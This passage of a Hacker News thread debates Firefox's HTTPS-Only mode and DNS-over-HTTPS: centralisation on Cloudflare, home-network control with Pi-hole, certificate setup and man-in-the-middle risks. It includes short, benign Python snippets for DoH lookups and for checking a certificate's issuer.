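    names = ["news.ycombinator.com", "example.com"]   # stand-ins for the harvested list
    for name in names:
        resp = requests.get(
            "https://cloudflare-dns.com/dns-query",
            params={"name": name, "type": "A"},
            headers={"accept": "application/dns-json"},
            timeout=10,
        )
        for ans in resp.json().get("Answer", []):
            if ans.get("type") == 1:                   # type 1 == A record
                print(f'{name}. 86400 IN A {ans["data"]}')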

DOH servers are not the only alternative source of DNS data.

Ideally, I prefer to avoid third party DNS altogether. Nor do I even need to run a local cache. I wrote some utilities that gather DNS data "non-recursively", querying only authoritative nameservers and never setting the RD bit. It is very fast. The only true "single source" of DNS data is the zone file for the particular RR at the designated authoritative nameserver(s). Everyone else is a middleman.

I am not a fan of applications doing their own DNS resolution, even if they use DOH. But I have found the existence of DOH servers, i.e., third party DNS caches served over HTTP, can be useful.


I have a root hints DNS server running in my home environment. I'd prefer to control DNS at the OS level. I also route my mobile devices through OpenVPN to cover when I'm not home. I control every aspect of all my devices' network traffic.


What you want would make censorship and surveillance easier against the vast majority of people. Networks I'm on shouldn't be able to tell which CloudFlare-hosted site I'm visiting, or to block some of them without blocking them all. Letting the network give me a DNS resolver instead of using a known-good one would allow exactly those bad things.


My perspective is this is my home network and this application is infringing on my freedom. I should have the right to monitor my network and my traffic. An application is a guest in my house/computer it does not set the rules.


> I should have the right to monitor my network and my traffic.

The key is that if it's really your traffic, then you can easily reconfigure Firefox so that you can monitor it. The benefit of DoH is that if someone else is using Firefox on their own computer, you can't snoop on or hijack their DNS just because they're on your network.


OK, what if you own the network? The corollary to that is 'you shouldn't be allowed to stop devices on your network from accessing malware, or exfiltrating data'.


Untrusted devices should be on a separate network where they don't have access to any data worth exfiltrating.


So you are suggesting we further centralise the web to avoid censorship and surveillance?


How is this further centralising the Web? You can still use whatever DoH provider you want (and there's plenty of them); the choice just shouldn't be tied to the network you're on.


But you don't want it tied to a specific application either. It should be an OS level setting that lets you configure what DNS to use based on circumstance. This is possible today for power users (on Linux at least) and wouldn't be hard to implement for normal users.


This is a fair point, but the reality today is that basically every OS uses the network-provided DNS servers by default, so Firefox is completely right today to ignore the OS by default. If this ever changes such that it is common for the OS to use DoH instead of the network-provided DNS servers by default, then I'd agree that Firefox should follow the OS.


Cool, that makes you one of the people that's going to keep DoH turned off. What's the problem?


The internet of crap will also use DoH and bypass my network settings.

Also, it is only a matter of time before ads (and websites) start using it to bypass browser DNS:

https://github.com/byu-imaal/dohjs


There is no reason they couldn't have done this without DoH being an available standard. Remember, DoH is just an ordinary HTTPS request. Anyone can hide almost anything in that, including their own homemade DNS.


Your concern about smart devices using DoH can be trivially avoided by not buying smart devices that use DoH, or even connect to the internet. Make sure that whatever you buy works with a local server such as Home Assistant and is actually under your own control. A system like this will be more reliable and customizable too.


Sometimes you don't own the computer on which the browser is running, e.g. public web browsing kiosk. Or else you sort of own the computer, but not the DNS.

If you work in a setting in which web surfing is intercepted, and outright breaks pages, the in-browser DNS can be a godsend.


Easily doable (at least for the browser): https://support.mozilla.org/en-US/kb/canary-domain-use-appli...


So now I have to add fake DNS records for every application that decides to do their own special snowflake thing and ignore the source of truth for what DNS server to use?

Oh joy.

I run DHCP for a reason. That reason is telling devices on my network what their settings should be. I expect those settings to be honored, not them doing the electronic equivalent of "okay boomer" and using whatever arbitrary settings they were told to by a corporation.


The reason to run DHCP is to allow devices to be configured automatically, not to restrict how they can be configured.


Software and hardware vendors need to start honoring the local configuration choices of the owner of the hardware and network. At a certain point ignoring my decisions about what can traverse my network becomes a crime and should be prosecuted as such.


You'd like Plan 9


I think in 2020 we can declare that Californian companies dictate what you can and can't do on your computer, which DNS server to use and what goes through a VPN client and what does not. The same way they decide what is a fact, what is newsworthy and what you are allowed to read / post.


"Eschew flamebait. Don't introduce flamewar topics unless you have something genuinely new to say. Avoid unrelated controversies and generic tangents."

https://news.ycombinator.com/newsguidelines.html


According to you it is a flamebait to have an observation? Ok, understood.


There are infinitely many observations. They don't select themselves. Humans do that, and not for neutral reasons [1].

Your comment was obviously trying to strike a blow for one side of a well-known argument that's going on right now. There are a few problems with that. First, blow-striking is not curious conversation; we can't have both, and HN exists for the latter [2]. Second, these arguments are so well known that the threads they lead to get increasingly predictable as they get more intense [3]. I'm sure you can see how that's bad for curious conversation too.

[1] https://hn.algolia.com/?dateRange=all&page=0&prefix=false&qu...

[2] https://news.ycombinator.com/newsguidelines.html

[3] https://hn.algolia.com/?dateRange=all&page=0&prefix=true&sor...


Fully support this argument and Mozilla's initiative.

I work for a firewall co and we have taken a strategic decision to not allow plaintext traffic onto the internet (from cloud deployments). It's just lazy on the client or server operator's part to not have it so.


this breaks caching of simple objects that do not require content security


Even "simple objects" can be MITM'd. I know I'm on the extreme theoretical edge, and so maybe your perspective is pragmatic enough to pass. But even small images, javascripts, etc. should be protected by HTTPS, not just "sensitive" pages.

As an end user, I don't want the possibility of anything being tampered with along the route. As a content owner / webmaster, I want the same. So publisher and consumer are both aligned in their desire, making HTTPS ideal for everyone except for people reading/manipulating traffic along the way.


speaking specifically of local package caches for things like onsite networks which are themselves signed OOB


From intermediate (MITM) caches, yes. But end-clients can still cache it though.

Our market is more backend API traffic, so it doesn't impact us as much.


Since it's becoming harder and harder to implement transparent proxies and caches, someone should define a local cache protocol so that network administrators can configure explicit shared caches for the devices on their networks.


> someone should define a local cache protocol

Someone did, almost two and a half decades ago. It's called the Internet Cache Protocol.

- Internet Cache Protocol (ICP), version 2 [0]

- Application of Internet Cache Protocol (ICP), version 2 [1]

--

[0]: https://tools.ietf.org/html/rfc2186

[1]: https://tools.ietf.org/html/rfc2187


The browser can still see everything and still cache whatever it wants. Safari and likely others are turning off cross site caching anyway.


HTTP != browser always


I’m surprised at the negative knee-jerk reaction

Increased corporate/government control and centralisation. That is a huge "do not want" for many of the HN crowd, including me.


Honest question. How is this feature enabling increased corporate/government control?


Because now almost every Firefox user will be sending their DNS straight to one centralized provider, a large corporation, which makes them more vulnerable to various kinds of government interference.


There is nothing about DNS over HTTPS that requires you to use one centralized provider, and unencrypted DNS has always been easier for large corporations, ISPs, and the government to sniff.

I think people are just totally off-base on this. The instances of government/corporation reactions to DOH that we have seen suggest that untrustworthy organizations and governments largely oppose the change. They would not oppose the change if it was in their best interest.

Worth noting that anyone can set up a DOH server. You can even set up your own server in your own house and use it the same way that you would a Pi-hole. To the extent that malware providers or IoT providers will use this to circumvent blocks, they already had the ability to do that -- and IoT services like Chromecasts have already experimented in the past with setting their own DNS providers and ignoring network settings.

We do not need to open up our networks to MiTM attacks to avoid centralization. Unencrypted DNS is a bad idea, it isn't complicated.


Firefox made DoH to Cloudflare the default, right?

This is not responsive to my argument that it will impact most Firefox users. Most people won't change their defaults. Defaults matter. And that goes double when you need to dink with your own DNS server to override this crap.


Firefox made DoH default to Cloudflare, but that's because Firefox was the browser that pushed DoH the hardest when it came out, and at the time Cloudflare was (and arguably still is):

a) the best provider available

b) more importantly, the most private provider available

But there's nothing about the technology locking Mozilla into keeping Cloudflare the default in perpetuity, and in any case, the solution to your concern is to adjust the defaults, not to throw out DoH entirely.

There's nothing about DoH in specific that's causing the concerns you have. Mozilla could have set Cloudflare DNS to be the default even for regular, unencrypted DNS traffic. There's nothing inherent in DNS technology that would force them to respect your OS settings. If you're concerned about Cloudflare taking over, rejecting DoH isn't the solution to that problem.

It's not an underhanded centralization push; it just so happens that when DoH was still new, there was effectively one provider that was widely available, that could confidently handle a large upsurge in traffic, and that made extremely strong privacy guarantees compared to the rest of the industry. At the time Mozilla started pushing DoH, most ISPs in the US didn't even offer it as an option at all. As that changes, I expect that browser defaults will change as well.


Cloudflare is the default DoH provider for Firefox only in the US. NextDNS is another option in the Firefox preferences UI, and more options (such as Comcast) are coming soon in the US and internationally. You can also specify a custom DoH provider URL:

https://support.mozilla.org/en-US/kb/firefox-dns-over-https#...


The kind of user who wouldn't change their default setting is probably already happily (or unknowingly) sending all their DNS traffic to their ISP.

I get your concern about cloudflare, but I can tell you right now which of the two options I would trust more with this data, and it's not Comcast/AT&T/Cox/<insert shady ISP here>


No offence, but how is that more centralised than all of your traffic being plainly visible to your ISP, which in many countries cooperates fairly closely with law enforcement and government, if it isn't straight up government owned, depending on what country you're in? For example in the UK, a fairly liberal country, DoH is still very useful for avoiding a lot of the ISP-level content blocking that happens, not to mention if you're in a place like Russia.

For most users on the planet Cloudflare is a hell of a lot better than your ISP


There are dozens or hundreds of competing ISPs. In the UK I certainly trust A&A a lot more than Cloudflare (who among other things are the #1 provider of fake HTTPS endpoints that send all your data in plaintext across the public internet).


> I’m surprised at the negative knee-jerk reaction.

Only Chrome is allowed to break stuff on the web, remember?


This is optional, so it's not breaking the web. It's like disabling JavaScript manually.


This site is likely to get annoyed at Chrome as well. Also, just because Chrome gets away with it doesn't mean it's an action that should be accepted purely for that reasoning.


DoH changes who gets all your DNS traffic from your ISP and your router to (in practice) a single central DoH provider. Which of those you trust least depends on who you are.


There is nothing preventing your ISP from providing DoH itself. Firefox (currently) does not use your ISPs settings by default (which imo is the correct move for now), but Chrome will use your ISP/router's DoH settings if it provides DoH.

There is nothing about DoH that forces you to use a single company.


Can a user use multiple (fallback) DNS-over-HTTPS providers? Do the DoH providers supply fallbacks (which iirc most DNS providers do)?


Depends on the client. Firefox doesn't support a fallback and tries unencrypted or fails depending on how you configured it. AdGuard Home can use fallbacks so you can run a local instance and point Firefox there. Some providers supply fallbacks (https://1.1.1.1/dns-query and https://1.0.0.1/dns-query for example).
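
If your client doesn't do it for you, rolling your own fallback is also straightforward; a rough sketch using those two Cloudflare endpoints as the example pair (error handling kept minimal):

    # Try the primary DoH endpoint and fall back to the secondary on failure.
    import requests

    ENDPOINTS = ["https://1.1.1.1/dns-query", "https://1.0.0.1/dns-query"]

    def resolve(name, rrtype="A"):
        for url in ENDPOINTS:
            try:
                resp = requests.get(
                    url,
                    params={"name": name, "type": rrtype},
                    headers={"accept": "application/dns-json"},
                    timeout=3,
                )
                resp.raise_for_status()
                return [a["data"] for a in resp.json().get("Answer", [])]
            except requests.RequestException:
                continue            # try the next endpoint
        raise RuntimeError(f"all DoH endpoints failed for {name}")

    print(resolve("example.com"))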


HTTPS Everywhere already supports an HTTPS-only mode called EASE; it is opt-in though.


Especially for average users, this is a lot better than the VPN snakeoil I keep seeing ads for.


I like the DoH initiative too. It's sad that Chrome doesn't support it for Linux yet and therefore Brave does not.

HTTPS upgrade feature has always been there in Brave.

Edit: I'm using system-wide DoT at the moment with CoreDNS but it doesn't work that well. Not sure why.


> This doesn’t guarantee the transport is end-to-end secure; I’m sure plenty will strip the encryption at an LB and then possibly send it back over the internet.

Hijacking this a bit - If plenty are stripping the encryption at an LB (like Cloudflare for example), how can you be sure that NSA is not wiretapping in Cloudflare's infrastructure where it is not encrypted? Seems like a really easy way to get unencrypted data and not care about if everything is HTTPS or not.

Are there any counterexamples to this? Do we know that Cloudflare or AWS is not doing this?


Agreed. I've been using this for several versions already (mentioned by other commenters - dom.security.https_only_mode). Very few websites break, and they should know better (e.g. HTTPS redirects to HTTP, redirects to another HTTPS location).

I've often daydreamed of a new HN feature where non-HTTPS links have a preceding red marker "[HTTP only]" (or similar) but never could find the correct place to write it down. Considering that Firefox is now a minority browser :( perhaps there is still usefulness in this idea?


I have mixed feelings about what you wrote.

100% with you that by itself, browser HTTPS-only mode (even by default) is A Good Thing. In isolation, this is a no-brainer and Mozilla's doing the right call.

I'm not happy with DoH though, at all. I fall in the crowd who wants to control my own DNS on my own devices (and I do realize that for those less technically knowledgeable, the status quo is putting that in the hands of the network admin or even ISP, but at least in principle they have the means to do so if they just figure out how, which is relatively trivial). DoH effectively completely cripples things like pihole. I'd have to start whitelisting IPs/hostnames for port 443 :/

Another practical negative consequence is the further centralization of TLS termination in (most notably) Cloudflare and Akamai, as I am sure this will be the default for those who are now rushed to TLS-enable currently non-compliant endpoints. Great sieves for XEyes and the private tracking industry.


I don't understand this criticism at all; could you clarify what the issue is?

None of this - DoH, nor HTTPS-only - is required. It's not even on by default (yet). If you have some specific wishes, it's trivial to pick a different DNS system, or leave https-only off.

Additionally, DoH and https-only aren't really closed or locked in in any way. There's a Cloudflare-based DoH option that's used by default, but just as you can pick your own DNS servers, you can also pick your own DoH servers. Sure, it's new (and thus not on by default), so selection is still fairly limited. But even ISPs are starting to offer DoH, and surely others will too. There's no reason to assume that you won't soon be able to pick from several choices for your DoH setup, including local or LAN options.

You mention pihole; and though I've never used it, they do have a page on DoH, and a superficial skim doesn't have any huge issues: https://docs.pi-hole.net/guides/dns-over-https/ - and looks like it's based on code described here https://developers.cloudflare.com/1.1.1.1/dns-over-https/clo... - and that supports upstream and downstream DoH, by the looks of it.

In other words: all change has some friction, but if you want local control, you still have it. The only thing you really lose is the ability for networks to hijack DNS on devices that don't trust them. And that's a feature, right? If you trust the network, sure, use that DNS if you want. But if you don't, better that it's easier to avoid control by that network.

What downsides does DoH have?


> None of this - DoH, nor HTTPS-only - is required. It's not even on by default (yet).

I had to disable DoH on all 5 of my machines because it was enabled automatically.

> You mention pihole; and though I've never used it, they do have a page on DoH

pihole supports using Cloudflare as an upstream DoH provider, not acting as a DoH provider.


> I had to disable DoH on all 5 of my machines because it was enabled automatically.

Some googling: it's on by default in the US now, not yet globally.

> pihole supports using Cloudflare as an upstream DoH provider, not acting as a DoH provider.

That's unfortunate; are you sure it's not just a little poorly documented? At least the underlying software they link to https://developers.cloudflare.com/1.1.1.1/dns-over-https/clo... clearly mentions a proxy functionality, but maybe that's not on yet?

In any case: the point is that just as DNS proxying became easier over time, so will DoH proxying. There's nothing wrong with sticking to old tech as you chose to if it's not yet convenient for you to switch; especially if pihole supports upstream DoH, since presumably you trust the network between your device and your pihole ;-) - rendering the rest of the DoH benefits moot.

I'm sure time will resolve issues like that, but in the meantime the vast majority of people, who didn't customize their DNS and don't choose at all, or who choose based on privacy or performance, get a more private & secure option by default. I mean, its transition pains are annoying, but it sounds like a good idea in general, so I suppose the transition costs are worth it in the long run, especially since the vast majority of users won't even notice. It's annoying to be in the camp that gets to bear the burden, for sure.


My objection is that the change was made without notice or explicit permission, and changed the chain of trust. Mozilla decided that I should trust Cloudflare and that I should not trust my own network or the corporate network.


Yeah, the rollout (as opposed to the feature) sounds poor. Since I didn't experience this - you're saying you upgraded FF and without notice your DNS settings were replaced? I.e. anything only resolvable on your LAN suddenly stopped working? That's pretty annoying to debug!


That's indeed what happened but only for US users.


Not OP. Did we ever allow browsers to set their own DNS server for plain DNS requests? (Let's ignore IE and its mess of mixing OS settings + browser settings a la "Internet Settings".)

For me at least, the biggest criticism of DoH is that it's not necessarily a centralized config at the OS level and seems to be a step in the direction of the general theme "Browser As Your OS".


Firefox DoH easily works with DNSCryptProxy. https://github.com/DNSCrypt/dnscrypt-proxy/wiki/Local-DoH

You can easily set it up to contact that, but enable some exclusions for specific domains if you wish to fallback to pihole.

It's probably not that efficient to be using pihole's filtering in Firefox compared with just uBlock Origin anyway.


> It's probably not that efficient to be using pihole's filtering in Firefox compared with just uBlock Origin anyway.

Pihole operates at the network level. It can block Windows Telemetry, ads on your Roku, smart devices trying to phone home, etc. Any guest devices that connect to your network also benefit without you having to install blockers on them.

It's not a replacement for ublock, it's used in conjunction with it.


Yea, I understand that which is why I keep pihole.

My argument though is in the context of Firefox, in which case the benefit of the pihole bit is dubious when you can install uBlock Origin. Pihole doesn't provide many additional benefits that can't be achieved with uBlock Origin's advanced filters.

Granted, someone could ask what the benefit of using dnscrypt-proxy is at that point. In that context, you gain better privacy (DNS requests are aggregated) and caching.


Your Pi-hole working on other people's devices is a bad thing. After all, there's nothing stopping you from configuring your Pi-hole to filter political content you disagree with instead of just ads, trackers, and malware.


> Your Pi-hole working on other people's devices is a bad thing.

No, it isn't. Never mind the fact that that isn't how PiHole works, I'm perfectly within my right to control how my home network functions.


I wasn't aware of this part of dnscrypt-proxy, thanks for sharing. I find network-level blocking and browser extensions work complementary.

In a broader sense, I guess the larger concern is malware and trackware on various devices where DoH is used maliciously. Especially smartphones. Granted, there is nothing stopping them today, but the normalization of DoH will put it within arm's reach for everyone.


I just hope we don't get a compromised CA, because a lot of governments are currently trying to fight encryption.

But agreed, it is a good idea. The only disadvantage I see is that some sites might not want to pay for a certificate and don't know how to easily obtain free ones. So it might kill some sites.


They don't need a compromised CA; a government can mandate that all devices in the country install its root cert. The good part is that it failed:

https://www.privateinternetaccess.com/blog/kazakhstan-tries-...


Not 100% sure why this is being downvoted, I think it is true that some sites, for one reason or another, probably will not adopt ACME/Let's Encrypt...


Could this or HTTPS Everywhere warn you when a site is known for encryption stripping? I think this happens on the free cloudflare tier and we can’t determine that.


How would you detect something like that? That's at the discretion of the party running the webserver/service and it's not directly observable. Cloudflare acts as a reverse proxy in front of the real origin server (which uses https), but that applies to a lot of internet sites nowadays (Cloudflare, Akamai, aws/gcp/azure and so on). CDN-origin connectivity is also encrypted; afaik you cannot downgrade and strip SSL (at least not with Akamai).


All HTTPS does is ensure security between your client and the server with the private key of the certificate. You typically trust certificate signers (globalsign, letsencrypt, etc) who have their own policies for ensuring who gets a certificate (in LE's case you have to prove ownership of the domain)

If a domain owner gets a certificate and gives it, and a private key, to a third party, then that's their business.


> All HTTPS does is ensure security between your client and the server with the private key of the certificate.

Just for completeness, HTTPS does not necessarily guarantee you are connected to the right server. This depends on the CAs you trust.

For example, larger enterprises commonly inject their own CA into their workstations in order to prevent loss of sensitive data. This allows SSL inspection proxies to terminate all SSL connections with a valid, trusted certificate from the perspective of that workstation.
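If you want to see this for yourself, here's a rough Python sketch that prints who issued the certificate your machine actually accepted; behind an SSL-inspection proxy the issuer will be the corporate CA rather than a public one (the hostname is just a placeholder):

    import socket, ssl

    HOST = "example.com"  # placeholder
    ctx = ssl.create_default_context()
    with socket.create_connection((HOST, 443), timeout=5) as sock:
        with ctx.wrap_socket(sock, server_hostname=HOST) as tls:
            cert = tls.getpeercert()  # the validated leaf certificate, as a dict

    issuer = dict(item[0] for item in cert["issuer"])
    subject = dict(item[0] for item in cert["subject"])
    print("subject CN:", subject.get("commonName"))
    print("issued by :", issuer.get("organizationName"), "/", issuer.get("commonName"))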


I just briefly played with it and there is an option to enable this mode globally and exclude specific sites (permanently or temporarily). Which is exactly what I needed.


Great to see this built into Firefox. I have been using HTTPS Everywhere https://www.eff.org/https-everywhere to achieve similar results; it won't warn you if it is not https (I think) but it will try and upgrade to https if it can. It is available for Chrome and Firefox.

What particularly annoyed me was using http to sites which supported https.


I remember years ago when Facebook wasn’t using https and a bunch of articles came out with how to access someone’s account if you’re both on unencrypted public wifi. Since then I’ve been a fan of https everywhere


IIRC this was around the time when someone created Firesheep [0] which made it really easy to steal unencrypted session cookies via packet sniffing, which sparked all those articles you are talking about.

[0]: https://en.wikipedia.org/wiki/Firesheep


For me at least it warns very blatantly, and I get asked whether I really want to go to an insecure site if it's HTTP only. Perhaps we don't have the same configuration.


That's not enabled by default, you first have to flip the "Encrypt All Sites Eligible" switch.


IIRC HTTPS Everywhere works by having a whitelist of domains that are also accessible over https, and switches to https for those.

So if a site isn't in the whitelist, it won't modify the request in any way.


HTTPS Everywhere will attempt to connect to a site using SSL, and if that times out will pop out an error message and allow you to load the site over HTTP temporarily. At least that's how it works on Firefox + latest version of the extension.


Only if you have the "encrypt all eligible sites" option enabled, which is disabled by default.




As others pointed out, you can set it up to always upgrade to HTTPS and warn you when it's not supported. But that's not gonna work all the time: some websites will have self-signed certificates (which is better than nothing, I guess), some will return 403 or 404 (for HTTPS only), some will just not load after trying for half a minute.


The Brave browser has this feature built-in, by the way (Settings > Shields > Upgrade connections to HTTPS [X])


awww crap - I've got loads of low-traffic websites that don't need https[1] that I'm now going to have to spend time sorting out certificates for.

To be honest, it's about time that cert enablement is built into all web server configs (on all OSs) as a native feature instead of having to manually roll the config using this week's currently preferred letsencrypt script.

---

[1] Yes, yes, I know everyone on HN prefers everything to be https, but out in the real world, most people don't care if all they are doing is browsing for information.


The main problem with keeping sites http is that someone in the middle can modify the content and inject arbitrary code, be it ads, crypto mining or just a redirect to a worse website.

Therefore I believe it should be a social duty to make everything https so as to ensure that we don’t create something that can be used to harm others.

I didn’t use to think like this, until I actually tried it out by going to a mall and doing it myself. Whoever was accessing simple http websites got the very short end of the stick (metaphorically speaking).


Funny how "security experts" here complain about the accidental non-repudiation misfeature of DKIM, but apparently being forced to do all the crazy crap HTTPS requires, when all you need is content signature verification, is perfectly fine with those same people. Security is becoming a field dominated by some bizarre corporate ideology.


I don't understand your point; content signature verification would have the same consequences as HTTPS for non-repudiation, no?

Also it's really different from DKIM: the problem with DKIM is that the signature is part of the email itself, so unless the receiver bothers to strip it (why would they?) it's stored forever in the metadata, even though arguably its use as an anti-spam feature stops being relevant once the message has been delivered to the MUA. So basically every time you send an email through gmail you effectively also send a signature saying "I, Google, vouch that h4x0r@gmail.com did send this email" and the receiving end will keep this signature for as long as they keep the email.

HTTPS session keys however are not typically saved unless somebody goes out of their way to do it. As such it's a lot less likely to be used for blackmail in hindsight. In general people use archive.org to prove that some content used to exist in this scenario, not old HTTPS session dumps.

And like for DKIM the solution is fairly trivial if it's really an issue: every time you rotate your keys (which should be fairly frequent if you use something like letsencrypt) be sure to make the expired private keys available publicly to give you plausible deniability.

I have yet to hear a good argument against HTTPS everywhere honestly, it generally boils down to "but I don't want to do it" with some weak post-hoc justification for why it's bad.


It’s perfectly fine only to the people who already did it; there are visibly annoyed comments from people who haven’t yet because they think it’s pointless, too. The same issue exists with DNS-over-HTTPS: most people don’t want to have to take new and extra steps to monitor DNS traffic in their home or workplace, and the prospect of having to do that work ranges from annoying to offensive (whether they actually use that capability or not).

DNS-over-HTTPS is one in a long series of decisions that contradict the assumption that network operators deserve cleartext access to your traffic. I suppose we can thank the NSA’s Room 641A for inspiring the tech world to pivot to this view all those years ago. It’s finally reaching critical mass, and endpoint network operators are furious at having their sniffing/spying capabilities hindered.

Captive WiFi portals are next on that list of institutions that are at risk of failing. I can’t wait, personally.


What "crazy crap" are you talking about? I get that HTTPS might be overkill for some situations, but it's not difficult to use and every client device supports it. If you came up with your own signature-but-no-encryption protocol (maybe something similar to DKIM, actually?), nobody would support it. Even if they did, I'm sure that some people would use it when HTTPS is a better solution, just because they don't understand the tradeoffs.

A standardized overkill solution that covers most use cases is probably better than n+1 standards with different tradeoffs.


I'm not sure if that "security expert" note is pointed at me (I have not talked about DKIM at all, nor do I consider myself a security expert by any means).

I'm merely pointing out what is in my humble opinion, even when no sensitive data is traveling, the main reason why HTTPS should be everywhere. If you believe there are other easy to deploy and maintain solutions with the same amount of relevant user outreach, then by all means suggest them.

(I could of course point other reasons, like the fact that even if your website has no sensitive data it can still be scraped to build a profile of the visitor by a third party, etc).


Doing content signature verification securely would require all the same "crazy crap" that HTTPS does (certificates, CAs, OCSP, ACME, etc). The PKI is the hard part; once you have that there's very little reason not to encrypt as well as sign.


True. Take away 20 or so of their IQ points, and the same people would be working for Uncle Sam, groping travelers at the airport.


I would love to see a version of www.paulgraham.com covered in FB ads for jobs at megacorps...


I've seen this said in several spots and I am curious. Could you point me to a resource that teaches me how to do this with a HTTP website please? I have no experience in doing this and am very interested to learn. Thanks in advance!


The answer to your question will depend on the set of technologies that you are using, but a great place to start is the EFF's Certbot[1]. Certbot will, for many common web servers, verify your servers' domain address and install a cert that will work for ~3 months. It's free and mostly automated.

I've been getting certs for all of my side projects and it takes about ~10 minutes each. Highly recommend.

[1] https://certbot.eff.org/


Oh wait, I didn't put across what I wanted. I meant how do I do a simple "attack" on a http website that's at a mall, as OP said. I know how to use certbot for the certificates (thank you Digital Ocean docs).

I was wondering. If I run a simple http page on my home network, how can I, from another device, change it or make another client get a modified page with the same address?


I think they are referring to ARP cache poisoning.

Or maybe Wi-Fi promiscuous mode packet sniffing, but that's a read-only attack.


There is a middle ground of authenticating traffic without encrypting it - cf. IPsec AH mode - granted, this type of thing isn't in HTTP but easily could be


What would be the advantage of that? Saving a few CPU cycles, maybe?


> The main problem with keeping sites http is that someone in the middle can modify the content and inject arbitrary code

I keep hearing this as a plausible excuse, yet I've never seen any proof of such.

non-https does make it possible but has anyone got any source where someone has been victim of such attacks?


> has anyone got any source where someone has been victim of such attacks?

Yes, the most well-known victim was GitHub. A malicious MITM injected JavaScript code into an unrelated non-HTTPS page, making browsers which visited that page do a DDoS attack against GitHub. Quoting https://arstechnica.com/information-technology/2015/04/meet-... "[...] The junk traffic came from computers of everyday people who browsed to websites that use analytics software from Chinese search engine Baidu to track visitor statistics. About one or two percent of the visits from people outside China had malicious code inserted into their traffic that caused their computers to repeatedly load the two targeted GitHub pages. [...]"


ISPs in the US have been doing it for years: https://www.infoworld.com/article/2925839/code-injection-new...


I did it myself for fun while I was in high-school, it's quite a trivial thing actually.

Just need to be on the same network as the victim and do some ARP spoofing to make your computer the gateway for that network.


A cursory search returns many examples, for instance : https://www.privateinternetaccess.com/blog/comcast-still-use...


First link: Kazakhstan even tried to MITM people using HTTPS; second: an ISP injecting ads.

[1]https://www.privateinternetaccess.com/blog/kazakhstan-tries-...

[2]https://security.stackexchange.com/questions/157828/my-isp-b...


Kazakhstan did not do that to inject ads. I believe they wanted to block webpages on a granular level (for example, some specific blogs). Right now they block complete websites, because it's not possible to find out which URL a user is visiting.


I read your parent as giving two separate examples.


Others have pointed it out, but ISPs (especially on mobile, at least in Portugal) often do this. They add a little banner at the top to tell you some random bullshit about their data plan or some other such shit they want to sell you.

As for attacks, others have pointed out examples as well, and I can assure you you can go far with them (and often with some simple social engineering).

HTTP is just a no-no for me as a developer.


Therefore I believe it should be a social duty to make everything https so as to ensure that we don’t create something that can be used to harm others.

Those who give up freedom for security deserve neither.


That quote is often taken badly out of context.

Benjamin Franklin, to the legislature of Pennsylvania, on the topic of basically letting the Penn family buy their way out of paying taxes indefinitely by providing enough hired mercenaries to protect the colony's frontier during the French and Indian war.

The freedom he was talking about was a legislature's freedom to govern.

The temporary security he was talking about was hired guns.

And none of it applies to the question of the tragedy of the commons that is "the HTTP protocol is embarrassingly insecure by default."

Indeed, if I were to torture the quote enough to make it fit, it looks more like "Those who would give up essential Liberty (Mozilla, in this case, to design the user agent the way they think best benefits their users and the World Wide Web as a whole) to purchase a little temporary Safety (... of their user count by delaying inconveniencing users in the corner cases where HTTPS can't be used), deserve neither Liberty nor Safety." But it barely fits.


What freedom do I give up by adding HTTPS to my website?


Nobody's saying you should be required by law to use HTTPS. Voting is a social duty too and it's not mandatory.


The world would be a better place if voting was mandatory ( like it is in Australia ).


Agree to disagree. I've met enough Americans to believe that if we made voting mandatory, we'd just end up with Optimus Prime at the top of the ticket.

You can make an act compulsory on the whole population but you can't legislate duty-of-care upon the whole population.


Voting should be mandatory but the first listed option for every office should be "I approve of no candidate and think none of them should win" (the disaffected vote), and the second listed option should be "I approve of every candidate and don't care who wins" (the apathetic vote). With our current system it's impossible to tease out how many voters are disaffected vs apathetic vs simply disenfranchised (in the above scheme, those who don't make it to the polls at all), which makes it impossible to confirm or deny that any candidate has the mandate of the people.


Technically those options are trivial with a non-defective system like approval voting, but assuming you're stuck with first-past-the-post, that's pretty much correct.


Not quite, even with normal approval voting there's no way to distinguish between voters who want to say "all these options are undesirable and everything is broken" and those who want to say "life is good, I'm cool with whoever" and those whose votes get lost or obstructed. The reason why the notion of a "protest vote" is so pointless under our current system is specifically due to the indistinguishability of the first from the latter ("people didn't stay home because they didn't like the candidates, they stayed home because they're so content!"). Additionally without mandatory voting it's difficult to determine where and how voter disenfranchisement is happening, but at the same time it would be unethical to force someone to cast a vote without giving them the option to voice discontent with the options.


What definition of "approval voting" are you using? I'm talking about a ballot where each candidate is marked "approve" or "reject". With that system, "all these options are undesirable and everything is broken" is reject-all, while "life is good, I'm cool with whoever" is approve-all (and lost or obstructed is obviously no ballot at all; there's not much you can do about that).



In the United States, it's considered a social duty but isn't mandatory.


If you're ok with fronting your sites with Cloudflare you can get "fake" HTTPS by using the flexible option (HTTPS from the client to Cloudflare, and HTTP from them to your server)

This satisfies the need to be on HTTPS, without actually having to change anything in your server.

Not saying this is ideal, but for websites that don't _need_ it it could be the best/easiest approach.


It doesn't completely block users from your site. It just makes them extra aware that any middleman will be able to see what they are reading, see anything they send and could possibly modify the traffic.

If you are concerned about the power-users who enable this being aware of these facts then maybe you do need https after all.

(Of course I suspect this mode will be made the default at some point, but that is probably at least a couple of years off.)


Take a look at Caddy server. Every site is configured for https by default with auto-renewed letsencrypt certificates. It even has an nginx-compatible configuration (but I think you'll like its own (really simple) config more)


I'll check it out - cheers!


> about time that cert enablement is built into all web server configs

It feels like we're slowly getting there! +1 for Caddy for making HTTPS a surprisingly pleasant process. My home router and NAS also support (and enable) Letsencrypt out of the box, which was a nice surprise.


I route my domains through cloudflare for this reason. Just makes life easier for my <1k visitors/month sites.


This is incredibly bad for the health of the web. In kneejerk response to the invasion of privacy from world governments we're handing absolute control of the web back to those very governments.

Everyone being forced to get permission from a centralized cert authority that is easily influenced, pressured, etc in order to host a visitable website is the end of the web as we know it. This is a slide into a total loss of autonomy.

I give it about 3 years before all commercial browsers stop allowing you to visit HTTP sites at all and Firefox only allows if you use their unstable beta build.

At that point you won't be able to host a visitable website without getting permission from someone else. And that's the end of the personal web.


I think you misunderstand how HTTPS works; there's no central root CA, and nothing stops you from adding other trusted root certificate authorities.

In fact, your browser trusts a few dozens of different ones, and companies routinely manage their own.


No, I'm just assuming that you're going to follow through on that thought and realize that statistically no one does that for self-signed certs, except corporations, which aren't human persons anyway.


The point isn't that you can run it yourself, it's that there isn't a central one and there are dozens or hundreds of different options already, based in different countries.


Firefox HTTPS-Only Mode is not enabled by default. The mode just shows the user an interstitial warning when navigating to non-HTTPS sites; the user is not blocked from visiting non-HTTPS sites.


One change I'd like to see in browsers is when the user enters a domain without protocol in the url bar it interprets that as https instead of http.


